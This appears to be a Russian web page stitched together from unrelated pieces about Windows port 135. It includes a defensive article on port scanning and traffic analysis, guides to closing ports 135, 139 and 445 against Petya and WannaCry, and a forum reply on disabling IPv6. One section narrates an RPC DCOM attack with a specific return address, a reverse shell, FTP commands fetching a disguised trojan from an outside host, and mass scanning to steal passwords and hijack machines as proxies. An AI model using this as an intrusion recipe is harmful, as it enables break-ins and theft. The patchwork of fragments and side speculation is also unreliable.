За что отвечает 135 порт в windows

Основы сетевых портов
Исследуем сетевые порты

Сетевые порты могут дать важнейшую информацию о приложениях, которые обращаются к компьютерам по сети. Зная приложения, которые используют сеть, и соответствующие сетевые порты, можно составить точные правила для брандмауэра, и настроить хост-компьютеры таким образом, чтобы они пропускали только полезный трафик. Построив профиль сети и разместив инструменты для распознавания сетевого трафика, можно более эффективно обнаруживать взломщиков — иногда просто анализируя генерируемый ими сетевой трафик. Эту тему мы начали рассматривать в первой части статьи, опубликованной в предыдущем номере журнала. Там приводились основные сведения о портах TCP/IP как фундаменте сетевой безопасности. Во второй части будут описаны некоторые методы для сетей и хост-компьютеров, с помощью которых можно определить приложения, прослушивающие сеть. Далее в статье будет рассказано о том, как оценить трафик, проходящий через сеть.

Блокирование сетевых приложений

Поверхность атаки по сети — общепринятый термин для описания уязвимости сети. Многие сетевые нападения проходят через уязвимые приложения, и можно существенно уменьшить площадь атаки, сократив число активных приложений в сети. Другими словами, следует отключить неиспользуемые службы, установить брандмауэр на выделенной системе для проверки законности трафика и составить исчерпывающий список управления доступом (access control list — ACL) для брандмауэра на периметре сети.

Каждый открытый сетевой порт представляет приложение, прослушивающее сеть. Поверхность атаки каждого сервера, подключенного к сети, можно уменьшить, отключив все необязательные сетевые службы и приложения. Версия Windows Server 2003 превосходит предшествующие версии операционной системы, так как в ней по умолчанию активизируется меньше сетевых служб. Однако аудит все же необходим, чтобы обнаружить вновь установленные приложения и изменения в конфигурации, которые открывают лишние сетевые порты.

Каждый открытый порт — потенциальная лазейка для взломщиков, которые используют пробелы в хост-приложении или тайком обращаются к приложению с именем и паролем другого пользователя (либо применяют другой законный метод аутентификации). В любом случае, важный первый шаг для защиты сети — просто отключить неиспользуемые сетевые приложения.

Сканирование портов

Сканирование портов — процесс обнаружения прослушивающих приложений путем активного опроса сетевых портов компьютера или другого сетевого устройства. Умение читать результаты сканирования и сравнивать сетевые отчеты с результатами хост-опроса портов позволяет составить ясную картину трафика, проходящего через сеть. Знание сетевой топологии — важное условие подготовки стратегического плана сканирования конкретных областей. Например, сканируя диапазон внешних IP-адресов, можно собрать ценные данные о взломщике, проникшем из Internet. Поэтому следует чаще сканировать сеть и закрыть все необязательные сетевые порты.

Внешнее сканирование портов брандмауэра позволяет обнаружить все откликающиеся службы (например, Web или электронная почта), размещенные на внутренних серверах. Эти серверы также следует защитить. Настройте привычный сканер портов (например, Network Mapper — Nmap) на проверку нужной группы портов UDP или TCP. Как правило, сканирование портов TCP — процедура более надежная, чем сканирование UDP, благодаря более глубокой обратной связи с ориентированными на соединения протоколами TCP. Существуют версии Nmap как для Windows, так и для Unix. Запустить базовую процедуру сканирования просто, хотя в программе реализованы и гораздо более сложные функции. Для поиска открытых портов на тестовом компьютере я запустил команду

nmap 192.168.0.161

На экране 1 показаны результаты сеанса сканирования — в данном случае компьютера Windows 2003 в стандартной конфигурации. Данные, собранные в результате сканирования портов, показывают наличие шести открытых портов TCP.

Экран 1. Базовый сеанс сканирования Nmap
  • Порт 135 используется функцией отображения конечных точек RPC, реализованной во многих технологиях Windows — например, приложениях COM/DCOM, DFS, журналах событий, механизмах репликации файлов, формирования очередей сообщений и Microsoft Outlook. Данный порт должен быть блокирован в брандмауэре на периметре сети, но трудно закрыть его и одновременно сохранить функциональность Windows.
  • Порт 139 используется сеансовой службой NetBIOS, которая активизирует браузер поиска других компьютеров, службы совместного использования файлов, Net Logon и службу сервера. Его трудно закрыть, как и порт 135.
  • Порт 445 используется Windows для совместной работы с файлами. Чтобы закрыть этот порт, следует блокировать File and Printer Sharing for Microsoft Networks. Закрытие этого порта не мешает соединению компьютера с другими удаленными ресурсами; однако другие компьютеры не смогут подключиться к данной системе.
  • Порты 1025 и 1026 открываются динамически и используются другими системными процессами Windows, в частности различными службами.
  • Порт 3389 используется Remote Desktop, которая не активизирована по умолчанию, но на моем тестовом компьютере активна. Чтобы закрыть порт, следует перейти к вкладке Remote в диалоговом окне System Properties и сбросить флажок Allow users to connect remotely to this computer.

Обязательно следует выполнить поиск открытых портов UDP и закрыть лишние. Программа сканирования показывает открытые порты компьютера, которые видны из сети. Аналогичные результаты можно получить с помощью инструментов, расположенных на хост-системе.

Хост-сканирование

Помимо использования сетевого сканера портов, открытые порты на хост-системе можно обнаружить с помощью следующей команды (запускается на хост-системе):

netstat -an

Эта команда работает как в Windows, так и в UNIX. Netstat выдает список активных портов компьютера. В Windows 2003 Windows XP следует добавить параметр -o, чтобы получить соответствующий идентификатор процесса (program identifier — PID). На экране 2 показаны выходные результаты Netstat для того же компьютера, сканирование портов которого выполнялось ранее. Следует обратить внимание на то, что закрыто несколько портов, которые прежде были активны.

Экран 2. Список открытых портов, полученный с помощью Netstat

Аудит журнала брандмауэра

Еще один полезный способ обнаружения сетевых приложений, которые отправляют или получают данные по сети, — собирать и анализировать больше данных в журнале брандмауэра. Записи Deny, в которых приводится информация с внешнего интерфейса брандмауэра, вряд ли будут полезны из-за «шумового трафика» (например, от червей, сканеров, тестирования по ping), засоряющего Internet. Но если записывать в журнал разрешенные пакеты с внутреннего интерфейса, то можно увидеть весь входящий и исходящий сетевой трафик.

Чтобы увидеть «сырые» данные трафика в сети, можно установить сетевой анализатор, который подключается к сети и записывает все обнаруженные сетевые пакеты. Самый широко распространенный бесплатный сетевой анализатор — Tcpdump для UNIX (версия для Windows называется Windump), который легко устанавливается на компьютере. После установки программы следует настроить ее для работы в режиме приема всех сетевых пакетов, чтобы регистрировать весь трафик, а затем подключить к монитору порта на сетевом коммутаторе и отслеживать весь трафик, проходящий через сеть. О настройке монитора порта будет рассказано ниже. Tcpdump — чрезвычайно гибкая программа, с помощью которой можно просматривать сетевой трафик с использованием специализированных фильтров и показывать только информацию об IP-адресах и портах либо все пакеты. Трудно просмотреть сетевые дампы в больших сетях без помощи соответствующих фильтров, но следует соблюдать осторожность, чтобы не потерять важные данные.

Объединение компонентов

До сих пор мы рассматривали различные методы и инструменты, с помощью которых можно обнаружить приложения, использующие сеть. Пришло время объединить их и показать, как определить открытые сетевые порты. Поразительно, как «болтливы» компьютеры в сети! Во-первых, рекомендуется познакомиться с документом Microsoft «Service overview and network port requirements for the Windows Server system» (http://support.microsoft.com/default.aspx?scid=kb;en-us;832017), в котором перечислены протоколы (TCP и UDP) и номера портов, используемые приложениями и большинством основных служб Windows Server. В документе описаны эти службы и используемые ими ассоциированные сетевые порты. Рекомендуется загрузить и распечатать это полезное для администраторов сетей Windows справочное руководство.

Настройка сетевого анализатора

Ранее отмечалось, что один из способов определить порты, используемые приложениями, — отслеживать трафик между компьютерами с помощью сетевого анализатора. Чтобы увидеть весь трафик, необходимо подключить сетевой анализатор к концентратору или монитору портов в коммутаторе. Каждому порту концентратора виден весь трафик каждого компьютера, подключенного к этому концентратору, но концентраторы — устаревшая технология, и большинство компаний заменяют их коммутаторами, которые обеспечивают хорошую производительность, но неудобны для анализа: каждый порт коммутатора принимает только трафик, направляемый одному компьютеру, подключенному к данному порту. Чтобы анализировать всю сеть, нужно отслеживать трафик, направляемый в каждый порт коммутатора.

Для этого требуется настроить монитор порта (разные поставщики называют его span port или mirrored port) в коммутаторе. Установить монитор порта в коммутаторе Cisco Catalyst компании Cisco Systems не составляет труда. Нужно зарегистрироваться на коммутаторе и активизировать режим Enable, затем перейти в режим configure terminal и ввести номер интерфейса порта коммутатора, на который следует посылать весь контролируемый трафик. Наконец, необходимо указать все отслеживаемые порты. Например, следующие команды обеспечивают мониторинг трех портов Fast Ethernet и пересылку копии трафика в порт 24.

interface FastEthernet0/24
port monitor FastEthernet0/1
port monitor FastEthernet0/2
port monitor FastEthernet0/3
end

В данном примере сетевой анализатор, подключенный к порту 24, будет просматривать весь исходящий и входящий трафик компьютеров, подключенных к первым трем портам коммутатора. Для просмотра созданной конфигурации следует ввести команду

show run

Чтобы сохранить новую конфигурацию, нужно использовать команду

write memory

Первоначальный анализ

Рассмотрим пример анализа данных, проходящих через сеть. Если для сетевого анализа используется компьютер Linux, то можно получить исчерпывающее представление о типе и частоте пакетов в сети с помощью такой программы, как IPTraf в режиме Statistical. Детали трафика можно выяснить с использованием программы Tcpdump.

В таблице приведены статистические выходные данные, собранные с помощью IPTraf в небольшой сети с Active Directory (AD) в течение 15 минут. Для краткости, тестирование проводилось вечером, когда никто из пользователей не обращался в сеть. В примере не показаны все порты Windows, но продемонстрированы приемы оценки портов и их привязки к службам и приложениям.

TCP 22. Наиболее активно работающий сетевой порт. Известно, что он используется программой Secure Shell (SSH), которую я применяю для подключения компьютера Linux с утилитой IPTraf.

UDP 138. Второй по частоте использования — UDP-порт 138, задействованный службой NetBIOS Datagram Service. В упомянутом выше документе Microsoft указывается, что данный порт используется несколькими службами Windows, в том числе Computer Browser, DFS, License, Messenger, Net Logon и Server. В группу портов TCP и UDP 135-139 входит несколько специфических портов, используемых многими приложениями Windows. По всей вероятности, некоторые из этих портов придется держать открытыми, что, к сожалению, открывает доступ к другим приложениям Windows.

TCP 80. Третий порт в списке — TCP-порт 80, который используется для незашифрованного трафика HTTP (Web). Но в режиме Statistics программы IPTraf нельзя определить, указывает ли данный трафик на попытки клиента обратиться к Web-серверу внутри сети или внутренний компьютер просто обращается к Web-серверу в Internet (более подробно о таком сценарии будет рассказано в следующем разделе).

UDP 137 и UDP 53. Эти порты используются службами преобразования имен Windows — в данном случае, NetBIOS и DNS.

UDP 67 и UDP 68. UDP-порты 67 и 68 используются DHCP-сервером для назначения динамических IP-адресов.

UDP 123. Данный порт зарезервирован для протокола Network Time Protocol (NTP) или, в случае Windows, Simple Network Time Protocol (SNTP). Этот протокол синхронизирует время между компьютером и NTP-сервером, например контроллером домена (DC).

Остальные порты получили лишь по одному пакету. Чтобы исследовать их, можно собирать статистику в течение более длительного времени и выявить закономерности, либо параллельно запустить Tcpdump и собрать больше данных, в частности, IP-адреса источника и назначения. Даже из приведенного общего вида можно извлечь информацию об этих пакетах. Например, каждый пакет имеет размер 229 байт; можно предположить, что одно приложение перескакивает между разными портами, но, чтобы утверждать это, требуется дополнительная информация.

Tcpdump

Tcpdump — превосходный инструмент командной строки для анализа сетей, который собирает детальные данные о пакетах в сети. Для того чтобы выяснить, где зарождается HTTP-трафик, можно воспользоваться командой

tcpdump -i eth1 -nq proto TCP
port 80

В данном простом примере требуется лишь узнать IP-адреса компьютеров, использующих HTTP, поэтому были задействованы параметры, которые показывают только данные TCP-порта 80. Параметр -i eth1 указывает анализируемый интерфейс. В нашей тестовой сети eth1 — это сетевой адаптер, подключенный к монитору порта в коммутаторе.

Параметр -nq представляет собой два отдельных параметра: -n предписывает Tcpdump не преобразовывать хост-имен и имен служб, а -q переводит Tcpdump в быстрый (скрытый) режим. Наконец, нужно просматривать только данные трафика TCP-порта 80, поэтому добавлена команда

proto TCP port 80

которая ограничивает объем рассматриваемых данных.

На экране 3 показаны выходные данные команды. Через порт 80 работают только два компьютера в сети 192.168.0.0. Отсюда можно сделать вывод, что компьютер по адресу 192.168.0.112 пытается обратиться к Web-серверу по адресу 192.168.0.7. Теперь можно проверить, находится ли по этому адресу законный Web-сервер, или классифицировать находку иным образом. Список всех параметров приведен на главной странице Tcpdump. Возможности этой программы широки.

Используя справочную таблицу сетевых портов в сочетании с результатами нескольких сеансов сканирования портов, можно составить карту сигнатур полезного трафика в сети. Затем можно будет отмечать отклонения от нормы.

Подготовка набора правил брандмауэра

Чтобы составить набор правил брандмауэра — особенно в сложных ситуациях, например в демилитаризованной зоне (DMZ), — следует применять все перечисленные выше методы оценки сетевого трафика. С их помощью можно точно установить задействованные сетевые порты. На основе этих данных строится набор правил брандмауэра. В DMZ изолируются компьютеры, которые принимают прямые соединения с Internet (например, внешние почтовые серверы, Web-серверы) от других серверов во внутренней сети. Компьютеры в DMZ также должны устанавливать соединения с некоторыми компьютерами во внутренней сети, поэтому необходимо создать набор правил брандмауэра, который разрешает такое соединение.

Рассмотрим два метода, с помощью которых можно определить списки ACL для правил брандмауэра в тестовой DMZ. Предположим, что Web-серверу в DMZ требуется извлечь данные из системы Microsoft SQL Server во внутренней сети. Вместо туманного правила, которое разрешает соединение между IP-адресом Web-сервера и IP-адресом системы SQL Server, следует составить списки ACL, которые разрешают только обращения к SQL Server.

Один из способов подготовки такого ACL — контролировать монитор порта и составить ACL на основе анализа обнаруженного трафика. Для этого нужно установить монитор порта на DMZ-интерфейсе брандмауэра и активизировать анализатор сети. На данном этапе следует убедиться, что между DMZ и внутренней подсетью правила брандмауэра не действуют. Затем требуется сгенерировать типичный сетевой трафик с помощью Web-приложения, как это делали бы пользователи. После просмотра данных сетевого анализатора нужно записать все уникальные IP-адреса и соединения сетевого порта. Наконец, на основе собранной информации следует составить и разместить списки ACL брандмауэра. В данном примере требуется, чтобы Web-сервер инициировал соединения с SQL Server. SQL Server использует TCP-порт 1433, поэтому в результатах сетевого анализатора должны быть пакеты, направляемые в этот порт. Однако, если Web-сервер является членом домена, DC которого находятся во внутренней сети, можно ожидать интенсивного сетевого трафика от Web-сервера к DC. После анализа результатов анализатора следует разрешить в ACL брандмауэра весь необходимый сетевой трафик.

Второй метод обнаружения портов, необходимых Web-серверу для связи с машиной SQL Server, — метод проб и ошибок, который заключается в создании и развертывании ACL, запрещающего трафик между DMZ и внутренней сетью.

Начав использовать Web-сервер, следует отыскать в журналах брандмауэра блокированные пакеты (вероятно, их будет много). Для каждого блокированного пакета необходимо исследовать и оценить адреса источника и назначения, а также информацию о сетевом порте. Затем составляются списки ACL, которые разрешают полезный трафик. Эту процедуру следует повторять до тех пор, пока из журнала не исчезнут записи Deny для пакетов, пересылаемых между DMZ и внутренней сетью.

Знание — лучшая защита

Итак, в этой и предыдущей статьях было рассказано о месте сетевых портов в общей сетевой модели, а также о средствах обнаружения и мониторинга сетевых приложений. Вооружившись этой информацией, любой ИТ-специалист сможет приступить к изучению сети, чтобы лучше понять и защитить свой участок Internet.


Джеф Феллинг — Директор по информационной безопасности компании Quantive. Автор книги IT Administrator?s Top 10 Introductory Scripts for Windows (издательство Charles River Media). jeff@blackstatic.com

Вчера неизвестные устроили очередную массовую атаку с помощью вируса-шифровальщика. Эксперты заявили, что пострадали десятки крупных компаний на Украине и в России. Вирус-шифровальщик носит название Petya.A (вероятно, вирус назван в честь Петра Порошенко). Пишут, что если создать файл perfc (без расширения) и разместить его по адресу C:Windows, вирус обойдет вас стороной. Если ваш компьютер ушел в перезагрузку и начал «проверку диска», нужно его немедленно выключить. Загрузка с с LiveCD или USB-диска даст доступ к файлам. Еще один способ защиты: закрыть порты 1024–1035, 135 и 445. Как это сделать мы сейчас разберемся на примере Windows 10.

Шаг 1

Переходим в Брандмауэр Windows
(лучше выбрать режим повышенной безопасности), выбираем вкладку «Дополнительные параметры
».
Выбираем вкладку «Правила для входящих подключений
», потом действие «Создать правило
» (в правой колонке).

Шаг 2

Выбираем тип правила — «для Порта
». В следующем окне выбираем пункт «Протокол TCP
», указываем порты, которые хотите закрыть. В нашем случае это «135, 445, 1024-1035
» (без кавычек).

Шаг 3

Выбираем пункт «Блокировать подключение
», в следующем окне отмечаем все профили: Доменный, Частный, Публичный.

Шаг 4

Осталось придумать название для правила (чтобы в будущем его было легко найти). Можно указать описание правила.

Если какие-то программы перестанут работать или станут работать неправильно, возможно, вы перекрыли порт, которые они используют. Нужно будет добавить для них исключение в брандмауэре.

135 TCP-порт
используется службами удалённого обслуживания (DHCP, DNS, WINS и т.д.) и в приложениях «клиент-сервер» Microsoft (например, Exchange).

445 TCP-порт
используется в Microsoft Windows 2000 и поздних версий для прямого TCP/IP-доступа без использования NetBIOS (например, в Active Directory).

Публикация

Вирус WannaCry, он же WannaCrypt или Wanna Decryptor, поразил виртуальный мир в мае 2017 года. Вредоносная программа проникала в локальные сети, заражая один компьютер за другим, шифровала файлы на дисках и требовала от пользователя перевести вымогателям от $300 до $600 за их разблокировку. Аналогичным образом действовал вирус Petya, получивший едва ли не политическую известность летом 2017 года.

Оба сетевых вредителя проникали в операционную систему компьютера-жертвы через одну и ту же дверь — сетевые порты 445 или 139. Вслед за двумя крупными вирусами и более мелкие виды компьютерной заразы начали эксплуатировать Что же это за порты, которые сканируют все, кому не лень?

За что отвечают порты 445 и 139 в ОС Windows

Данные порты используются в системе Windows для совместной работы с файлами и принтерами. Первый порт отвечает за работу протокола Server Message Blocks (SMB), а через второй работает протокол Network Basic Input-Output System (NetBIOS). Оба протокола позволяют компьютерам под управлением Windows подключаться по сети к «расшаренным» папкам и принтерам поверх основных протоколов TCP и UDP.

Начиная с Windows 2000, совместная работа с файлами и принтерами по сети осуществляется в основном через порт 445 по прикладному протоколу SMB. Протокол NetBIOS использовался в более ранних версиях системы, работая через порты 137, 138 и 139, и данная возможность сохранилась в более поздних версиях системы в качестве атавизма.

Чем опасны открытые порты

445 и 139 представляет собой незаметную, но значимую уязвимость в Windows. Оставляя данные порты незащищенными, вы широко распахиваете дверь на свой жесткий диск для непрошеных гостей вроде вирусов, троянов, червей, а также для хакерских атак. А если ваш компьютер включен в локальную сеть, то риску заражения вредоносным программным обеспечением подвергаются все ее пользователи.

Фактически, вы открываете совместный доступ к своему жесткому диску любому, кто сумеет получить доступ к данным портам. При желании и умении злоумышленники могут просмотреть содержимое жесткого диска, а то и удалить данные, форматировать сам диск или зашифровать файлы. Именно это и делали вирусы WannaCry и Petya, эпидемия которых прокатилась по миру этим летом.

Таким образом, если вы заботитесь о безопасности своих данных, будет не лишним узнать, как закрыть порты 139 и 445 в Windows.

Выясняем, открыты ли порты

В большинстве случаев порт 445 в Windows открыт, так как возможности совместного доступа к принтерам и файлам автоматически включаются еще при установке Windows. Это можно легко проверить на своей машине. Нажмите сочетание клавиш Win + R
, чтобы открыть окно быстрого запуска. В нем введите
cmd”
для запуска командной строки. В командной строке наберите “netstat —
na
” и нажмите Enter
. Данная команда позволяет просканировать все активные сетевые порты и вывести данные об их статусе и текущих входящих подключениях.

Через несколько секунд появится таблица статистики по портам. В самом верху таблицы будет указан IP-адрес порта 445. Если в последнем столбце таблицы будет стоять статус “LISTENING”
, то это означает, что порт открыт. Аналогичным образом можно найти в таблице порт 139 и выяснить его статус.

Как закрыть порты в Windows 10/8/7

Существует три основных метода, позволяющих закрыть порт 445 в Windows 10, 7 или 8. Они не сильно отличаются друг от друга в зависимости от версии системы и достаточно просты. Можно попробовать любой из них на выбор. Этими же способами можно закрыть и порт 139.

Закрываем порты через брандмауэр

Первый метод, позволяющий закрыть 445 порт в Windows, является наиболее простым и доступен практически любому пользователю.

  1. Перейдите в Пуск > Панель управления > Брандмауэр Windows
    и нажмите на ссылку Дополнительные параметры
    .
  2. Нажмите Правила для входящих исключений > Новое правило
    . В отобразившемся окне выберите Для порта > Далее > Протокол TCP > Определенные локальные порты
    , в поле рядом введите 445 и нажмите Далее.
  3. Далее выберите Блокировать подключение
    и опять нажмите Далее
    . Установите три галочки, снова Далее
    . Укажите название и, при желании, описание нового правила и нажмите Готово
    .

Теперь возможность входящего соединения на порт 445 будет закрыта. Если необходимо, аналогичное правило можно создать и для порта 139.

Закрываем порты через командную строку

Второй метод включает в себя операции с командной строкой и больше подходит для продвинутых пользователей Windows.

  1. Нажмите Пуск
    и в строке поиска в нижней части меню наберите “cmd”
    . В отобразившемся списке кликните правой кнопкой мыши на cmd
    и выберите Запуск от имени администратора
    .
  2. В окно командной строки скопируйте команду netsh advfirewall set allprofile state on.
    Нажмите Enter.
  3. Затем скопируйте следующую команду: netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name=»Block_TCP-445″.
    Нажмите Enter
    еще раз.

В результате выполнения процедуры так же будет создано правило брандмауэра Windows для закрытия порта 445. Некоторые пользователи, впрочем, сообщают, что данный метод не работает на их машинах: при проверке порт остается в статусе “LISTENING”. В этом случае следует попробовать третий способ, который также достаточно прост.

Блокировать соединения на порт 445 можно также путем внесения изменений в системный реестр. Использовать данный метод следует с осторожностью: реестр Windows является основной базой данных всей системы, и случайно допущенная ошибка может привести к непредсказуемым последствиям. Перед работой с реестром рекомендуется сделать резервную копию, например, с помощью программы CCleaner.

  1. Нажмите Пуск
    и в строке поиска введите “regedit”
    . Нажмите Enter
    .
  2. В дереве реестра перейдите в следующий каталог: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesNetBTParameters.
  3. В правой части окна отобразится список параметров. Нажмите правой кнопкой мыши в свободной области списка и выберите Создать
    . В раскрывающемся меню выберите Параметр DWORD (32-bit)
    или Параметр DWORD (64-bit)
    в зависимости от типа вашей системы (32-битная или 64-битная).
  4. Переименуйте новый параметр в SMBDeviceEnabled
    , а затем дважды кликните по нему. В отобразившемся окне Изменение параметра
    в поле Значение
    замените 1 на 0 и нажмите OK
    для подтверждения.

Этот способ является наиболее эффективным, если точно следовать приведенной выше инструкции. Следует отметить, что он относится только к порту 445.

Для того чтобы защита была эффективнее, после внесения изменений в реестр можно также отключить службу Windows Server. Для этого выполните следующее:

  1. Нажмите Пуск и в строке поиска введите «services.msc».
    Откроется список системных служб Windows.
  2. Найдите службу Server и дважды кликлите по ней. Как правило, она располагается где-то в середине списка.
  3. В отобразившемся окне в раскрывающемся списке Тип запуска
    выберите Отключена
    и нажмите ОК
    .

Приведенные выше методы (за исключением третьего) позволяют закрыть не только порт 445, но и порты 135, 137, 138, 139. Для этого при выполнении процедуры просто заменяйте номер порта на нужный.

Если вам впоследствии понадобится открыть порты, просто удалите созданное правило в брандмауэре Windows или измените значение созданного в реестре параметра с 0 на 1, а потом включите обратно службу Windows Server, выбрав в списке Тип запуска
значение Автоматически
вместо Отключена
.

Важно!
Необходимо помнить, что порт 445 в Windows отвечает за совместный доступ к файлам, папкам и принтерам. Таким образом, если вы закроете данный порт, вы больше не сможете «расшарить» общую папку для других пользователей или распечатать документ по сети.

Если ваш компьютер включен в локальную сеть и данные функции необходимы вам для работы, следует воспользоваться сторонними средствами защиты. К примеру, активируйте сетевой экран вашего антивируса, который возьмет под контроль все порты и будет осуществлять их мониторинг на предмет несанкционированного доступа.

Выполняя приведенные выше рекомендации, можно обезопасить себя от незаметной, но серьезной уязвимости в Windows и защитить свои данные от многочисленных видов зловредного программного обеспечения, которое способно проникнуть в систему через порты 139 и 445.

Уязвимость была устрашающей, правда
готовый эксплоит оказался недоступен для
основной массы людей… Наверное поэтому
никто не чувствовал страха…

Группа польских экспертов в области
безопасности компьютерных технологий «Last
Stage of Delirium» сообщила публике о найденной
ими уязвимости, обработки DCOM объектов в
контексте RPC протокола. Это было чем-то
потрясающим, поскольку данный протокол
использовался практически всеми
существующими на этот момент версиями Windows.
Уязвимыми оказались ОС Windows NT, Windows XP, Windows 2000
и даже Windows Server 2003 был под прицелом. Этого
было более чем достаточно, чтобы завладеть
компьютерами большинства пользователей
сети Internet. Более того, многие серверы не
блокировали входящие пакеты на 135 порт,
именно он использовался для атаки. Что
делало их потенциальными жертвами.

Но спустя несколько часов Todd Sabin сообщает,
что уязвимыми являются все сервисы RPC. Это
значит, что настройка брандмауэра на
блокировку 135 порта является не достаточным
средством защиты. Опасности подвергаются
компьютеры с открытыми 135 (UDP/TCP), 139, 445 и 593
портами. СМИ освещают данную ошибку, как
потенциальную угрозу для безопасности
пользователей Windows. Дело шло к глобальной
катастрофе. Но поскольку публичного
эксплоита выпущено не было, все продолжали
жить своей прежней жизнью не задумываясь о
последствиях его появления в массах.

Но не все так пассивно отреагировали на
появление данной уязвимости. Хакеры
понемногу начинали писать приватные
эксплоиты, а script kids продолжали ждать его
появления. Результат не заставил себя долго
ждать. В течении нескольких дней появляются
некоторые наработки в этой области,
появляются первые эксплоиты. Тем не менее
большинство из них просто провоцирует сбой
на удаленной системе. Что можно объяснить,
поскольку технических деталей по поводу
найденной уязвимости известно не было. Хотя
некоторые версии ОС уже успешно
эксплуатировались.

Этот день стал переломным в истории
эксплуатации данной уязвимости. Наконец
появляется техническое описание проблемы.
После чего рождается большое количество
эксплоитов, под разные версии Windows.
Некоторые из них имеют даже графический
интерфейс, а иногда и функцию сканирования
определенного диапазона IP адресов.

Именно в этот момент началась массивная
атака хакеров на рядовых пользователей.
Более того, появился интернет червь MS Blast,
который с легкостью проникал на компьютеры
подключенные к Интернету и даже в
корпоративные сети крупнейших компаний
мира. В опасности оказались все…

Напасть на удаленную машину не составляет
особого труда. Поэтому script kids взялись за
свое дело. Кража кредитных кард и приватных
эксплоитов возросла в несколько раз. И
многие лакомые сегменты сети стали
пробоваться на вкус. Именно этим занялся
один хакер. Он давно хотел захватить сервер,
но приличной уязвимости под него до этого
не было. А не воспользоваться таким
подарком судьбы он просто не мог.

Пьеса в три акта

Первое, что пришлось ему сделать перед
атакой, это проверить какая именно
операционная система установлена на
сервере. Для этого он воспользовался
утилитой nmap. Хакер не раз уже писал о ее
возможностях, но я повторюсь и скажу, что
она используется для определения версии ОС
на удаленном компьютере. Благо она
существует как для Windows, так и для *nix. А
поскольку хакер для своей работы
использовал Windows, то его выбор пал на
графический вариант nmap.

Несколько минут работы сканера и
результат позитивный. 135 порт оказался
открытым и не защищенным брандмауэром. Это
было началом конца, началом долгожданной
атаки. На этот момент уже было написано
много эксплоитов, в том числе и «RCP Exploit GUI #2».
Его отличительной чертой было то, что он
имел графический интерфейс и содержал в
себе встроенные функции сканирования
диапазона IP, а также FTP сервер.

Запустив эксплоит, он указал адрес
целевого компьютера. Но в списке ОС для
атакуемых машин Windows NT указан не был. А ведь
именно она была установлена на сервере. Это
серьезная проблема, поскольку чтобы
запустить эксплоит необходимо знать его
точный адрес в памяти, чтобы потом передать
на него управление. Немного покопавшись в
файлах, скачанных вместе с эксплоитом он
нашел небольшой список адресов под широкую
разновидность линейки Windows. Среди них
присутствовал и Windows NT с предустановленным
Service Pack 4. Именно его значение он указал в
качестве адреса возврата, плюнув на ручной
выбор ОС. Число 0xE527F377 стало его тайным
пропуском в жизнь сервера. И он начал атаку.

Система сдалась без каких-либо
происшествий, так у хакера появился reverse-shell
с удаленным сервером. Теперь, когда он мог
исполнять на нем все что угодно, пришло
время установить Троян. Среди большого
числа возможных, был выбран DonaldDick. Для
осуществления своего плана ему пришлось
получить хостинг на бесплатном сервере с
поддержкой FTP. Вполне подошел BY.RU, именно
туда он и закачал сервер для трояна. Теперь,
когда DonaldDick стал доступным по FTP, он обратно
взялся за жертву, а точнее начал закачивать
на нее сервер трояна. Это был хорошо
продуманный план, поскольку уязвимость
могли пропатчить, а троян он и в Африке
троян. Набрав в консоли ftp он принялся
закачивать файл. Весь процесс занял у него,
написания всего лишь пяти строк:

open by.ru
имя_сервера.by.ru
пароль
get fooware.exe
bye

Где fooware.exe это переименованный сервер для
DonaldDick. Когда файл закачался, ему осталось
только запустить его. Для этого он просто
написал имя файла (fooware.exe) и с наслаждением
нажал Enter… После чего хакер получил удобный
контроль над сервером.

Но знаете как оно всегда бывает, когда
находишь что-то интересное продолжаешь с
этим играть. Так и наш Хакер захотел
получить более чем одну систему. Посмотрев,
что эксплоит позволяет провести массивное
сканирование, он взялся за работу, а точнее
за работу взялся KaHt. Его использование
оказалось не трудным. Так например, чтобы
про сканировать сеть с IP 192.168.0.* (класс С), ему
нужно было набрать «KaHt.exe 129.168.0.1
192.168.0.254″. Что собственно он и сделал,
после чего периодически проверял
результаты. Таким образом он получил доступ
к еще большему количеству пользователей, от
которых потом сумел получить пароли на
разные сервисы, почты, и много другой
полезной информации. Не говоря уже про то,
что он стал пользоваться многими из них как
анонимными прокси.

Пища к размышлению

Хотя Microsoft давно выпустила заплатку,
пользователи и админы не спешат
устанавливать патчи, надеясь что их сеть не
будет никому интересной. Но таких хакеров
большое количество и установка патча это
скорее необходимость, нежели возможность.
Еще можно блокировать все входящие пакеты
на 135, 139, 445 и 593 порты.

Естественно, что все это хакер делал через
анонимную прокси, а в результате почистил
за собой следы присутствия в системе. Но вам
следует задуматься, прежде чем повторять
его подвиги. Ведь такие действия считаются
противозаконными и могут закончиться для
вас достаточно плачевно…

Кровный
, то, что у вас фаервол показывает, что svchost.exe слушает данный порт, ещё не означает, что он открыт для подключения извне.

Правила у вас вроде бы прописаны и должны работать.

Вы сканерами портов пробовали проверять? — ЦОБ (Центр Обеспечения Безопасности) (п.2.7)

И не забудьте о том, что ещё надо будет проверить IPv6, т.к. он у вас в системе включен, а вот сканеры обычно проверяют только IPv4 (я про централизованные сервисы).

Если данный протокол вам вообще не нужен, тогда его можно отключить:

Чтобы отключить компоненты IP версии 6 в Windows Vista, выполните указанные ниже действия.

1. Нажмите кнопку Пуск, введите regedit в поле Начать поиск, затем выберите regedit.exe в списке Программы.

2. В диалоговом окне Контроль учетных записей пользователей нажмите кнопку Продолжить.

3. Найдите и выберите следующий подраздел реестра:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip6Parameters

4. Дважды щелкните пункт DisabledComponents для изменения параметра DisabledComponents.

Примечание. Если параметр DisabledComponents недоступен, его необходимо создать. Для этого выполните указанные ниже действия.

1. В меню Правка выберите пункт Создать, а затем — Параметр DWORD (32 бита).

2. Введите DisabledComponents и нажмите клавишу ВВОД.

3. Дважды щелкните пункт DisabledComponents.

5. Введите любое из указанных ниже значений для настройки протокола IP версии 6, а затем нажмите кнопку ОК.

1. Введите 0, чтобы включить все компоненты IP версии 6.

Примечание. Значение «0» используется по умолчанию.

2. Введите 0xffffffff, чтобы отключить все компоненты IP версии 6, кроме интерфейса замыкания на себя. При этом значении Windows Vista также будет использовать в политиках префиксов протокол IP версии 4 вместо IPv6.

3. Введите 0x20, чтобы использовать в политиках префикса IP версии 4 вместо IP версии 6.

4. Введите 0x10, чтобы отключить собственные интерфейсы IP версии 6.

5. Введите 0x01, чтобы отключить все туннельные интерфейсы IP версии 6.

6. Введите 0x11, чтобы отключить все интерфейсы IP версии 6, кроме интерфейса замыкания на себя.

Примечания

